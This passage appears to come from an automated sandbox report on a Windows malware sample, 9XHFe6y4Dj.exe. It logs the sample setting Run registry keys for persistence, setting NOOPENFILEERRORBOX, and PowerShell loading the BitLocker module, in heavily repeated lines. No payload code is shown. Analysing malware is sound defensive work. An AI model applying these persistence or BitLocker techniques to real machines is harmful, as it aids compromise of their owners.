                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9XHFe6y4DjJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9XHFe6y4DjJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tqeRXJHxPWPPoiNqjJeEYdvJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tqeRXJHxPWPPoiNqjJeEYdvJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tqeRXJHxPWPPoiNqjJeEYdvJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tqeRXJHxPWPPoiNqjJeEYdvJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tqeRXJHxPWPPoiNqjJeEYdvJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tqeRXJHxPWPPoiNqjJeEYdvJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tqeRXJHxPWPPoiNqjJeEYdvJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tqeRXJHxPWPPoiNqjJeEYdvJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
